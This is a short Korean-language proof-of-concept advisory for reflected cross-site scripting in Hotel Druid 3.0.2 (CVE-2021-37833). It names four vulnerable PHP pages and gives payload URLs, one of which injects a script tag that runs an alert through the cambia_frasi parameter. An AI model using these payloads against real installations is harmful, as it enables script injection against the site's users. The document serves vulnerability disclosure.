
Hotel Druid 3.0.2의 반사형 크로스 사이트 스크립팅(XSS) 취약점에 대한 개념 증명(PoC)으로, 여러 취약한 PHP 페이지를 통해 임의 JavaScript 실행을 시연합니다.
Hotel Druid 애플리케이션 3.0.2 버전의 여러 페이지에 반사형 크로스 사이트 스크립팅 취약점이 존재하며, 이로 인해 임의의 JavaScript 명령이 실행될 수 있습니다. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37833
취약한 PHP 페이지:
crea_modelli.php - cambia_frasi 매개변수 visualizza_tabelle.php - 임의의 URL 매개변수 tabella.php - 임의의 URL 매개변수 storia_soldi.php - 임의의 URL 매개변수
취약한 페이로드
/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1
/storia_soldi.php?piu17">e3esq=1
/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(%27xss%20hotel%20druid%27)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1
/tabella.php?jkuh3">yql8b=1
발견자: Joe Helle, 2021년 7월